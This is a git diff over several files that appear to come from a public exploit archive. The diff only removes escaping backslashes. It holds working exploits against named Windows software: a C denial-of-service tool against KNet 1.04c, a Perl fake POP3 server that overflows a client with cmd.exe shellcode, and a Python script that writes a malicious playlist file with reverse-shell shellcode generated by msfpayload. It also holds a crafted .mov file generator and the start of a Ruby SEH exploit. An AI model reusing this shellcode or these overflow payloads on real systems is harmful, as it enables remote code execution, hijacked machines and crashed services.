-\"\\x61\\x62\\x63\\x64\". #EAX here
-\"\\x41\\x41\\x41\\x41\\x41\\x41\".
-\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x44\\x44\\x44\\x44\\x41\\x41\\x43\\x43\".
-\"\\x43\\x41\\x41\\x41\\x42\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\";
+"\x00\x00\x00\x7d\x6d\x6f\x6f\x76\x00\x00\x00\x75\x72\x6d\x72\x61\x00\x00\x00\x6d".
+"\x72\x6d\x64\x61\x00\x00\x00\x55\x72\x64\x72\x66\x00\x00\x00\x00\x75\x72\x6c\x20".
+"\x00\x00\x00\x41\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31".
+"\x2f\x74\x65\x73\x74\x2e\x6d\x6f\x76\x00\x00\x00\x00\x10\x72\x6d\x64\x72\x00\x00".
+"\x00\x00\x00\x00\x05\x78".
+"\x41\x42\x43\x44". #EDI here
+"\x61\x62\x63\x64". #EAX here
+"\x41\x41\x41\x41\x41\x41".
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x44\x44\x44\x44\x41\x41\x43\x43".
+"\x43\x41\x41\x41\x42\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
 
 
-open(out, \"> test.mov\");
+open(out, "> test.mov");
 binmode(out);
 print (out $movfile);
 close(out);
diff --git a/platforms/windows/dos/843.c b/platforms/windows/dos/843.c
index 355f77b14..ec414a1e6 100755
--- a/platforms/windows/dos/843.c
+++ b/platforms/windows/dos/843.c
@@ -11,7 +11,7 @@
 
 -=[+] Application:    Knet
 -=[+] Version:        1.04c
--=[+] Vendor\'s URL:   www.stormystudios.com
+-=[+] Vendor's URL:   www.stormystudios.com
 -=[+] Platform:       Windows
 -=[+] Bug type:       Buffer overflow
 -=[+] Exploitation:   Remote
@@ -68,27 +68,27 @@ if(argc < 3 ) {
  help(argv[0]);
  exit(0);
 }
-printf(\"\\n\\n-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-\\n\");
+printf("\n\n-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-\n");
    he = gethostbyname(argv[1]);
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
 request = (char *) malloc(12344);
    trg.sin_family = AF_INET;
    trg.sin_port = htons(atoi(argv[2]));
    trg.sin_addr = *((struct in_addr *) he->h_addr);
-   memset(&(trg.sin_zero), \'\\0\', 8);
-printf(\"\\n\\nConnecting to target \\t...\");
+   memset(&(trg.sin_zero), '\0', 8);
+printf("\n\nConnecting to target \t...");
 rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
 if(rc==0)
 {
- printf(\"[Done]\\nBuilding evil buffer\\t...\");
+ printf("[Done]\nBuilding evil buffer\t...");
  memset(evilbuf,90,1023);
- printf(\"[Done]\\nSending evil request   \\t...\");
- sprintf(request,\"GET %s \\n\\r\\n\\r\",evilbuf);
+ printf("[Done]\nSending evil request   \t...");
+ sprintf(request,"GET %s \n\r\n\r",evilbuf);
  send(sockfd,request,strlen(request),0);
- printf(\"[Done]\\n\\n[Finished] Check the server now\\n\");
+ printf("[Done]\n\n[Finished] Check the server now\n");
 }
 else
- printf(\"[Fail] -> Unable to connect\\n\\n\");
+ printf("[Fail] -> Unable to connect\n\n");
 close(sockfd);
 return 0;
 
@@ -96,10 +96,10 @@ return 0;
 
 void help(char *program_name) {
 
-printf(\"\\n\\t-=[      KNet <= 1.04b PoC Denial Of Service      ]=-\\n\");
-printf(\"\\t-=[                                                    ]=-\\n\");
-printf(\"\\t-=[      Coded by ders -/www.x0n3-h4ck.org\\\\-      ]=-\\n\\n\");
-printf(\"Usage: %s  \\n\",program_name);
+printf("\n\t-=[      KNet <= 1.04b PoC Denial Of Service      ]=-\n");
+printf("\t-=[                                                    ]=-\n");
+printf("\t-=[      Coded by ders -/www.x0n3-h4ck.org\\-      ]=-\n\n");
+printf("Usage: %s  \n",program_name);
 }
 
 // milw0rm.com [2005-02-25]
\ No newline at end of file
diff --git a/platforms/windows/dos/9881.txt b/platforms/windows/dos/9881.txt
index 50f19fbe2..e82c9dfe7 100755
--- a/platforms/windows/dos/9881.txt
+++ b/platforms/windows/dos/9881.txt
@@ -8,7 +8,7 @@ Exploitation: remote BoF
 
 Date:         2009-10-06
 
-Author:       Francis Provencher (Protek Research Lab\'s) 
+Author:       Francis Provencher (Protek Research Lab's) 
 
 Special Thanks to:  M Jeremy Brown 	
              
@@ -65,25 +65,25 @@ $port = 110;
 
 # Simple cmd.exe
 
-$sc2 =  \"\\xB8\\xFF\\xEF\\xFF\\xFF\\xF7\\xD0\\x2B\\xE0\\x55\\x8B\\xEC\" .
-        \"\\x33\\xFF\\x57\\x83\\xEC\\x04\\xC6\\x45\\xF8\\x63\\xC6\\x45\" .
-        \"\\xF9\\x6D\\xC6\\x45\\xFA\\x64\\xC6\\x45\\xFB\\x2E\\xC6\\x45\" .
-        \"\\xFC\\x65\\xC6\\x45\\xFD\\x78\\xC6\\x45\\xFE\\x65\\x8D\\x45\" .
-        \"\\xF8\\x50\\xBB\\xC7\\x93\\xBF\\x77\\xFF\\xD3\";
+$sc2 =  "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC" .
+        "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45" .
+        "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45" .
+        "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45" .
+        "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3";
 
 
-$serv = IO::Socket::INET->new(Proto=>\'tcp\',
+$serv = IO::Socket::INET->new(Proto=>'tcp',
                               LocalPort=>$port,
                               Listen=>1)
-or die \"Error: listen($port)\\n\";
+or die "Error: listen($port)\n";
 
-$cli = $serv->accept() or die \"Error: accept()\\n\";
+$cli = $serv->accept() or die "Error: accept()\n";
 
-$retaddr = pack(\'l\', $ret);
-$junk    = \"A\" x 709;
+$retaddr = pack('l', $ret);
+$junk    = "A" x 709;
 
 
-$payload = \"-ERR \" . $junk . $retaddr  . \"\\x90\" x 1 . $sc2 .  \"\\r\\n\"; # 714 to overwrite EIP
+$payload = "-ERR " . $junk . $retaddr  . "\x90" x 1 . $sc2 .  "\r\n"; # 714 to overwrite EIP
 
      $cli->send($payload);
 
diff --git a/platforms/windows/local/10747.py b/platforms/windows/local/10747.py
index 59c004dbf..2c0a00652 100755
--- a/platforms/windows/local/10747.py
+++ b/platforms/windows/local/10747.py
@@ -11,63 +11,63 @@
 # Downloadable from: http://mini-stream.net/
 # Tested against WinXP SP2 and SP3 - English
 
-outputfile=\\\\\\\"astley.pls\\\\\\\"
+outputfile="astley.pls"
 
 
-shellcode=\\\\\\\"\\\\\\\\x44\\\\\\\"*17403
-#shellcode+=\\\\\\\"\\\\\\\\xed\\\\\\\\x1e\\\\\\\\x94\\\\\\\\x7c\\\\\\\" # JMP ESP - SHELL32.dll Win XP SP2
-shellcode+=\\\\\\\"\\\\\\\\x53\\\\\\\\x93\\\\\\\\x42\\\\\\\\x7e\\\\\\\" # JMP ESP - USER32.dll Win XP SP3
-shellcode+=\\\\\\\"CAFE\\\\\\\"*8 # 32 Byte NOP Sled
+shellcode="\x44"*17403
+#shellcode+="\xed\x1e\x94\x7c" # JMP ESP - SHELL32.dll Win XP SP2
+shellcode+="\x53\x93\x42\x7e" # JMP ESP - USER32.dll Win XP SP3
+shellcode+="CAFE"*8 # 32 Byte NOP Sled
 # msfpayload windows/shell_reverse_tcp LHOST=172.16.77.218 LPORT=443 R | msfencode -e x86/alpha_upper -t c
-shellcode+=(\\\\\\\"\\\\\\\\x89\\\\\\\\xe5\\\\\\\\xda\\\\\\\\xd6\\\\\\\\xd9\\\\\\\\x75\\\\\\\\xf4\\\\\\\\x58\\\\\\\\x50\\\\\\\\x59\\\\\\\\x49\\\\\\\\x49\\\\\\\\x49\\\\\\\\x49\\\\\\\\x43\\\\\\\"
-\\\\\\\"\\\\\\\\x43\\\\\\\\x43\\\\\\\\x43\\\\\\\\x43\\\\\\\\x43\\\\\\\\x51\\\\\\\\x5a\\\\\\\\x56\\\\\\\\x54\\\\\\\\x58\\\\\\\\x33\\\\\\\\x30\\\\\\\\x56\\\\\\\\x58\\\\\\\\x34\\\\\\\"
-\\\\\\\"\\\\\\\\x41\\\\\\\\x50\\\\\\\\x30\\\\\\\\x41\\\\\\\\x33\\\\\\\\x48\\\\\\\\x48\\\\\\\\x30\\\\\\\\x41\\\\\\\\x30\\\\\\\\x30\\\\\\\\x41\\\\\\\\x42\\\\\\\\x41\\\\\\\\x41\\\\\\\"
-\\\\\\\"\\\\\\\\x42\\\\\\\\x54\\\\\\\\x41\\\\\\\\x41\\\\\\\\x51\\\\\\\\x32\\\\\\\\x41\\\\\\\\x42\\\\\\\\x32\\\\\\\\x42\\\\\\\\x42\\\\\\\\x30\\\\\\\\x42\\\\\\\\x42\\\\\\\\x58\\\\\\\"
-\\\\\\\"\\\\\\\\x50\\\\\\\\x38\\\\\\\\x41\\\\\\\\x43\\\\\\\\x4a\\\\\\\\x4a\\\\\\\\x49\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x4d\\\\\\\\x38\\\\\\\\x4d\\\\\\\\x59\\\\\\\\x45\\\\\\\\x50\\\\\\\"
-\\\\\\\"\\\\\\\\x43\\\\\\\\x30\\\\\\\\x45\\\\\\\\x50\\\\\\\\x43\\\\\\\\x50\\\\\\\\x4d\\\\\\\\x59\\\\\\\\x4a\\\\\\\\x45\\\\\\\\x46\\\\\\\\x51\\\\\\\\x48\\\\\\\\x52\\\\\\\\x42\\\\\\\"
-\\\\\\\"\\\\\\\\x44\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x52\\\\\\\\x50\\\\\\\\x30\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x52\\\\\\\\x44\\\\\\\\x4c\\\\\\\\x4c\\\\\\\\x4b\\\\\\\"
-\\\\\\\"\\\\\\\\x50\\\\\\\\x52\\\\\\\\x45\\\\\\\\x44\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x43\\\\\\\\x42\\\\\\\\x51\\\\\\\\x38\\\\\\\\x44\\\\\\\\x4f\\\\\\\\x48\\\\\\\\x37\\\\\\\\x51\\\\\\\"
-\\\\\\\"\\\\\\\\x5a\\\\\\\\x51\\\\\\\\x36\\\\\\\\x46\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x50\\\\\\\\x31\\\\\\\\x4f\\\\\\\\x30\\\\\\\\x4e\\\\\\\\x4c\\\\\\\\x47\\\\\\\\x4c\\\\\\\"
-\\\\\\\"\\\\\\\\x43\\\\\\\\x51\\\\\\\\x43\\\\\\\\x4c\\\\\\\\x44\\\\\\\\x42\\\\\\\\x46\\\\\\\\x4c\\\\\\\\x51\\\\\\\\x30\\\\\\\\x4f\\\\\\\\x31\\\\\\\\x48\\\\\\\\x4f\\\\\\\\x44\\\\\\\"
-\\\\\\\"\\\\\\\\x4d\\\\\\\\x43\\\\\\\\x31\\\\\\\\x4f\\\\\\\\x37\\\\\\\\x4d\\\\\\\\x32\\\\\\\\x4a\\\\\\\\x50\\\\\\\\x46\\\\\\\\x32\\\\\\\\x46\\\\\\\\x37\\\\\\\\x4c\\\\\\\\x4b\\\\\\\"
-\\\\\\\"\\\\\\\\x51\\\\\\\\x42\\\\\\\\x42\\\\\\\\x30\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x42\\\\\\\\x47\\\\\\\\x4c\\\\\\\\x45\\\\\\\\x51\\\\\\\\x4e\\\\\\\\x30\\\\\\\\x4c\\\\\\\"
-\\\\\\\"\\\\\\\\x4b\\\\\\\\x47\\\\\\\\x30\\\\\\\\x42\\\\\\\\x58\\\\\\\\x4d\\\\\\\\x55\\\\\\\\x49\\\\\\\\x50\\\\\\\\x44\\\\\\\\x34\\\\\\\\x50\\\\\\\\x4a\\\\\\\\x45\\\\\\\\x51\\\\\\\"
-\\\\\\\"\\\\\\\\x4e\\\\\\\\x30\\\\\\\\x46\\\\\\\\x30\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x48\\\\\\\\x45\\\\\\\\x48\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x58\\\\\\\\x47\\\\\\\"
-\\\\\\\"\\\\\\\\x50\\\\\\\\x45\\\\\\\\x51\\\\\\\\x48\\\\\\\\x53\\\\\\\\x4a\\\\\\\\x43\\\\\\\\x47\\\\\\\\x4c\\\\\\\\x47\\\\\\\\x39\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x47\\\\\\\\x44\\\\\\\"
-\\\\\\\"\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x43\\\\\\\\x31\\\\\\\\x4e\\\\\\\\x36\\\\\\\\x46\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x50\\\\\\\\x31\\\\\\\\x4f\\\\\\\\x30\\\\\\\\x4e\\\\\\\"
-\\\\\\\"\\\\\\\\x4c\\\\\\\\x4f\\\\\\\\x31\\\\\\\\x48\\\\\\\\x4f\\\\\\\\x44\\\\\\\\x4d\\\\\\\\x45\\\\\\\\x51\\\\\\\\x4f\\\\\\\\x37\\\\\\\\x46\\\\\\\\x58\\\\\\\\x4d\\\\\\\\x30\\\\\\\"
-\\\\\\\"\\\\\\\\x44\\\\\\\\x35\\\\\\\\x4b\\\\\\\\x44\\\\\\\\x45\\\\\\\\x53\\\\\\\\x43\\\\\\\\x4d\\\\\\\\x4b\\\\\\\\x48\\\\\\\\x47\\\\\\\\x4b\\\\\\\\x43\\\\\\\\x4d\\\\\\\\x46\\\\\\\"
-\\\\\\\"\\\\\\\\x44\\\\\\\\x42\\\\\\\\x55\\\\\\\\x4b\\\\\\\\x52\\\\\\\\x50\\\\\\\\x58\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x51\\\\\\\\x48\\\\\\\\x47\\\\\\\\x54\\\\\\\\x43\\\\\\\\x31\\\\\\\"
-\\\\\\\"\\\\\\\\x49\\\\\\\\x43\\\\\\\\x45\\\\\\\\x36\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x44\\\\\\\\x4c\\\\\\\\x50\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x51\\\\\\\\x48\\\\\\\\x45\\\\\\\"
-\\\\\\\"\\\\\\\\x4c\\\\\\\\x43\\\\\\\\x31\\\\\\\\x49\\\\\\\\x43\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x43\\\\\\\\x34\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x45\\\\\\\\x51\\\\\\\\x4e\\\\\\\\x30\\\\\\\"
-\\\\\\\"\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x50\\\\\\\\x44\\\\\\\\x46\\\\\\\\x44\\\\\\\\x46\\\\\\\\x44\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x45\\\\\\\\x31\\\\\\\\x46\\\\\\\"
-\\\\\\\"\\\\\\\\x39\\\\\\\\x50\\\\\\\\x5a\\\\\\\\x50\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x51\\\\\\\\x48\\\\\\\\x51\\\\\\\\x4f\\\\\\\\x51\\\\\\\\x4a\\\\\\\"
-\\\\\\\"\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x44\\\\\\\\x52\\\\\\\\x4a\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x46\\\\\\\\x51\\\\\\\\x4d\\\\\\\\x45\\\\\\\\x38\\\\\\\\x50\\\\\\\\x33\\\\\\\\x50\\\\\\\"
-\\\\\\\"\\\\\\\\x32\\\\\\\\x45\\\\\\\\x50\\\\\\\\x43\\\\\\\\x30\\\\\\\\x42\\\\\\\\x48\\\\\\\\x43\\\\\\\\x47\\\\\\\\x43\\\\\\\\x43\\\\\\\\x50\\\\\\\\x32\\\\\\\\x51\\\\\\\\x4f\\\\\\\"
-\\\\\\\"\\\\\\\\x51\\\\\\\\x44\\\\\\\\x42\\\\\\\\x48\\\\\\\\x50\\\\\\\\x4c\\\\\\\\x43\\\\\\\\x47\\\\\\\\x46\\\\\\\\x46\\\\\\\\x43\\\\\\\\x37\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x48\\\\\\\"
-\\\\\\\"\\\\\\\\x55\\\\\\\\x4e\\\\\\\\x58\\\\\\\\x4a\\\\\\\\x30\\\\\\\\x45\\\\\\\\x51\\\\\\\\x45\\\\\\\\x50\\\\\\\\x45\\\\\\\\x50\\\\\\\\x47\\\\\\\\x59\\\\\\\\x48\\\\\\\\x44\\\\\\\"
-\\\\\\\"\\\\\\\\x46\\\\\\\\x34\\\\\\\\x46\\\\\\\\x30\\\\\\\\x43\\\\\\\\x58\\\\\\\\x47\\\\\\\\x59\\\\\\\\x4b\\\\\\\\x30\\\\\\\\x42\\\\\\\\x4b\\\\\\\\x45\\\\\\\\x50\\\\\\\\x4b\\\\\\\"
-\\\\\\\"\\\\\\\\x4f\\\\\\\\x49\\\\\\\\x45\\\\\\\\x46\\\\\\\\x30\\\\\\\\x50\\\\\\\\x50\\\\\\\\x46\\\\\\\\x30\\\\\\\\x50\\\\\\\\x50\\\\\\\\x47\\\\\\\\x30\\\\\\\\x46\\\\\\\\x30\\\\\\\"
-\\\\\\\"\\\\\\\\x47\\\\\\\\x30\\\\\\\\x50\\\\\\\\x50\\\\\\\\x45\\\\\\\\x38\\\\\\\\x4a\\\\\\\\x4a\\\\\\\\x44\\\\\\\\x4f\\\\\\\\x49\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x4b\\\\\\\"
-\\\\\\\"\\\\\\\\x4f\\\\\\\\x48\\\\\\\\x55\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x49\\\\\\\\x57\\\\\\\\x42\\\\\\\\x48\\\\\\\\x4e\\\\\\\\x4c\\\\\\\\x42\\\\\\\\x30\\\\\\\\x50\\\\\\\\x4d\\\\\\\"
-\\\\\\\"\\\\\\\\x48\\\\\\\\x5a\\\\\\\\x42\\\\\\\\x48\\\\\\\\x45\\\\\\\\x52\\\\\\\\x45\\\\\\\\x50\\\\\\\\x45\\\\\\\\x51\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x4d\\\\\\\"
-\\\\\\\"\\\\\\\\x36\\\\\\\\x42\\\\\\\\x4a\\\\\\\\x44\\\\\\\\x50\\\\\\\\x50\\\\\\\\x56\\\\\\\\x51\\\\\\\\x47\\\\\\\\x43\\\\\\\\x58\\\\\\\\x4c\\\\\\\\x59\\\\\\\\x49\\\\\\\\x35\\\\\\\"
-\\\\\\\"\\\\\\\\x42\\\\\\\\x54\\\\\\\\x45\\\\\\\\x31\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x4e\\\\\\\\x35\\\\\\\\x43\\\\\\\\x58\\\\\\\\x42\\\\\\\\x43\\\\\\\\x42\\\\\\\\x4d\\\\\\\\x42\\\\\\\"
-\\\\\\\"\\\\\\\\x44\\\\\\\\x45\\\\\\\\x50\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x4b\\\\\\\\x53\\\\\\\\x51\\\\\\\\x47\\\\\\\\x46\\\\\\\\x37\\\\\\\\x50\\\\\\\\x57\\\\\\\\x46\\\\\\\\x51\\\\\\\"
-\\\\\\\"\\\\\\\\x4b\\\\\\\\x46\\\\\\\\x43\\\\\\\\x5a\\\\\\\\x44\\\\\\\\x52\\\\\\\\x50\\\\\\\\x59\\\\\\\\x50\\\\\\\\x56\\\\\\\\x4a\\\\\\\\x42\\\\\\\\x4b\\\\\\\\x4d\\\\\\\\x42\\\\\\\"
-\\\\\\\"\\\\\\\\x46\\\\\\\\x4f\\\\\\\\x37\\\\\\\\x47\\\\\\\\x34\\\\\\\\x46\\\\\\\\x44\\\\\\\\x47\\\\\\\\x4c\\\\\\\\x45\\\\\\\\x51\\\\\\\\x43\\\\\\\\x31\\\\\\\\x4c\\\\\\\\x4d\\\\\\\"
-\\\\\\\"\\\\\\\\x47\\\\\\\\x34\\\\\\\\x51\\\\\\\\x34\\\\\\\\x42\\\\\\\\x30\\\\\\\\x48\\\\\\\\x46\\\\\\\\x45\\\\\\\\x50\\\\\\\\x50\\\\\\\\x44\\\\\\\\x51\\\\\\\\x44\\\\\\\\x50\\\\\\\"
-\\\\\\\"\\\\\\\\x50\\\\\\\\x46\\\\\\\\x36\\\\\\\\x50\\\\\\\\x56\\\\\\\\x46\\\\\\\\x36\\\\\\\\x47\\\\\\\\x36\\\\\\\\x51\\\\\\\\x46\\\\\\\\x50\\\\\\\\x4e\\\\\\\\x50\\\\\\\\x56\\\\\\\"
-\\\\\\\"\\\\\\\\x46\\\\\\\\x36\\\\\\\\x46\\\\\\\\x33\\\\\\\\x51\\\\\\\\x46\\\\\\\\x42\\\\\\\\x48\\\\\\\\x43\\\\\\\\x49\\\\\\\\x48\\\\\\\\x4c\\\\\\\\x47\\\\\\\\x4f\\\\\\\\x4d\\\\\\\"
-\\\\\\\"\\\\\\\\x56\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x48\\\\\\\\x55\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x4d\\\\\\\\x30\\\\\\\\x50\\\\\\\\x4e\\\\\\\\x51\\\\\\\\x46\\\\\\\\x47\\\\\\\\x36\\\\\\\"
-\\\\\\\"\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x50\\\\\\\\x30\\\\\\\\x43\\\\\\\\x58\\\\\\\\x45\\\\\\\\x58\\\\\\\\x4b\\\\\\\\x37\\\\\\\\x45\\\\\\\\x4d\\\\\\\\x45\\\\\\\\x30\\\\\\\\x4b\\\\\\\"
-\\\\\\\"\\\\\\\\x4f\\\\\\\\x49\\\\\\\\x45\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x30\\\\\\\\x4f\\\\\\\\x45\\\\\\\\x4f\\\\\\\\x52\\\\\\\\x50\\\\\\\\x56\\\\\\\\x42\\\\\\\\x48\\\\\\\"
-\\\\\\\"\\\\\\\\x49\\\\\\\\x36\\\\\\\\x4c\\\\\\\\x55\\\\\\\\x4f\\\\\\\\x4d\\\\\\\\x4d\\\\\\\\x4d\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x4e\\\\\\\\x35\\\\\\\\x47\\\\\\\\x4c\\\\\\\\x43\\\\\\\"
-\\\\\\\"\\\\\\\\x36\\\\\\\\x43\\\\\\\\x4c\\\\\\\\x44\\\\\\\\x4a\\\\\\\\x4d\\\\\\\\x50\\\\\\\\x4b\\\\\\\\x4b\\\\\\\\x4d\\\\\\\\x30\\\\\\\\x43\\\\\\\\x45\\\\\\\\x45\\\\\\\\x55\\\\\\\"
-\\\\\\\"\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x47\\\\\\\\x44\\\\\\\\x53\\\\\\\\x44\\\\\\\\x32\\\\\\\\x42\\\\\\\\x4f\\\\\\\\x42\\\\\\\\x4a\\\\\\\\x45\\\\\\\\x50\\\\\\\\x46\\\\\\\"
-\\\\\\\"\\\\\\\\x33\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x4e\\\\\\\\x35\\\\\\\\x44\\\\\\\\x4a\\\\\\\\x41\\\\\\\\x41\\\\\\\")
+shellcode+=("\x89\xe5\xda\xd6\xd9\x75\xf4\x58\x50\x59\x49\x49\x49\x49\x43"
+"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
+"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
+"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
+"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4d\x59\x45\x50"
+"\x43\x30\x45\x50\x43\x50\x4d\x59\x4a\x45\x46\x51\x48\x52\x42"
+"\x44\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x50\x52\x44\x4c\x4c\x4b"
+"\x50\x52\x45\x44\x4c\x4b\x43\x42\x51\x38\x44\x4f\x48\x37\x51"
+"\x5a\x51\x36\x46\x51\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c"
+"\x43\x51\x43\x4c\x44\x42\x46\x4c\x51\x30\x4f\x31\x48\x4f\x44"
+"\x4d\x43\x31\x4f\x37\x4d\x32\x4a\x50\x46\x32\x46\x37\x4c\x4b"
+"\x51\x42\x42\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x4e\x30\x4c"
+"\x4b\x47\x30\x42\x58\x4d\x55\x49\x50\x44\x34\x50\x4a\x45\x51"
+"\x4e\x30\x46\x30\x4c\x4b\x50\x48\x45\x48\x4c\x4b\x50\x58\x47"
+"\x50\x45\x51\x48\x53\x4a\x43\x47\x4c\x47\x39\x4c\x4b\x47\x44"
+"\x4c\x4b\x43\x31\x4e\x36\x46\x51\x4b\x4f\x50\x31\x4f\x30\x4e"
+"\x4c\x4f\x31\x48\x4f\x44\x4d\x45\x51\x4f\x37\x46\x58\x4d\x30"
+"\x44\x35\x4b\x44\x45\x53\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x46"
+"\x44\x42\x55\x4b\x52\x50\x58\x4c\x4b\x51\x48\x47\x54\x43\x31"
+"\x49\x43\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x48\x45"
+"\x4c\x43\x31\x49\x43\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x4e\x30"
+"\x4c\x49\x50\x44\x46\x44\x46\x44\x51\x4b\x51\x4b\x45\x31\x46"
+"\x39\x50\x5a\x50\x51\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x51\x4a"
+"\x4c\x4b\x44\x52\x4a\x4b\x4c\x46\x51\x4d\x45\x38\x50\x33\x50"
+"\x32\x45\x50\x43\x30\x42\x48\x43\x47\x43\x43\x50\x32\x51\x4f"
+"\x51\x44\x42\x48\x50\x4c\x43\x47\x46\x46\x43\x37\x4b\x4f\x48"
+"\x55\x4e\x58\x4a\x30\x45\x51\x45\x50\x45\x50\x47\x59\x48\x44"
+"\x46\x34\x46\x30\x43\x58\x47\x59\x4b\x30\x42\x4b\x45\x50\x4b"
+"\x4f\x49\x45\x46\x30\x50\x50\x46\x30\x50\x50\x47\x30\x46\x30"
+"\x47\x30\x50\x50\x45\x38\x4a\x4a\x44\x4f\x49\x4f\x4b\x50\x4b"
+"\x4f\x48\x55\x4c\x49\x49\x57\x42\x48\x4e\x4c\x42\x30\x50\x4d"
+"\x48\x5a\x42\x48\x45\x52\x45\x50\x45\x51\x4f\x4b\x4c\x49\x4d"
+"\x36\x42\x4a\x44\x50\x50\x56\x51\x47\x43\x58\x4c\x59\x49\x35"
+"\x42\x54\x45\x31\x4b\x4f\x4e\x35\x43\x58\x42\x43\x42\x4d\x42"
+"\x44\x45\x50\x4c\x49\x4b\x53\x51\x47\x46\x37\x50\x57\x46\x51"
+"\x4b\x46\x43\x5a\x44\x52\x50\x59\x50\x56\x4a\x42\x4b\x4d\x42"
+"\x46\x4f\x37\x47\x34\x46\x44\x47\x4c\x45\x51\x43\x31\x4c\x4d"
+"\x47\x34\x51\x34\x42\x30\x48\x46\x45\x50\x50\x44\x51\x44\x50"
+"\x50\x46\x36\x50\x56\x46\x36\x47\x36\x51\x46\x50\x4e\x50\x56"
+"\x46\x36\x46\x33\x51\x46\x42\x48\x43\x49\x48\x4c\x47\x4f\x4d"
+"\x56\x4b\x4f\x48\x55\x4c\x49\x4d\x30\x50\x4e\x51\x46\x47\x36"
+"\x4b\x4f\x50\x30\x43\x58\x45\x58\x4b\x37\x45\x4d\x45\x30\x4b"
+"\x4f\x49\x45\x4f\x4b\x4c\x30\x4f\x45\x4f\x52\x50\x56\x42\x48"
+"\x49\x36\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x43"
+"\x36\x43\x4c\x44\x4a\x4d\x50\x4b\x4b\x4d\x30\x43\x45\x45\x55"
+"\x4f\x4b\x50\x47\x44\x53\x44\x32\x42\x4f\x42\x4a\x45\x50\x46"
+"\x33\x4b\x4f\x4e\x35\x44\x4a\x41\x41")
 
 
-FILE = open(outputfile, \\\\\\\"w\\\\\\\")
+FILE = open(outputfile, "w")
 FILE.write(shellcode)
 FILE.close()
\ No newline at end of file
diff --git a/platforms/windows/local/11079.rb b/platforms/windows/local/11079.rb
index 35a69cb36..017f4aaf5 100755
--- a/platforms/windows/local/11079.rb
+++ b/platforms/windows/local/11079.rb
@@ -10,59 +10,59 @@
 # Type of vuln  : Stack Overflow / SEH
 # Greetz to     : Corelan Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me
 #
-# Script provided \\\'as is\\\', without any warranty.
+# Script provided 'as is', without any warranty.
 # Use for educational purposes only.
 #
 #
 #
 
 banner =
-\\\"|------------------------------------------------------------------|\\\\n\\\" +
-\\\"|                         __               __                      |\\\\n\\\" +
-\\\"|   _________  ________  / /___ _____     / /____  ____ _____ ___  |\\\\n\\\" +
-\\\"|  / ___/ __ \\\\\\\\/ ___/ _ \\\\\\\\/ / __ `/ __ \\\\\\\\   / __/ _ \\\\\\\\/ __ `/ __ `__ \\\\\\\\ |\\\\n\\\" +
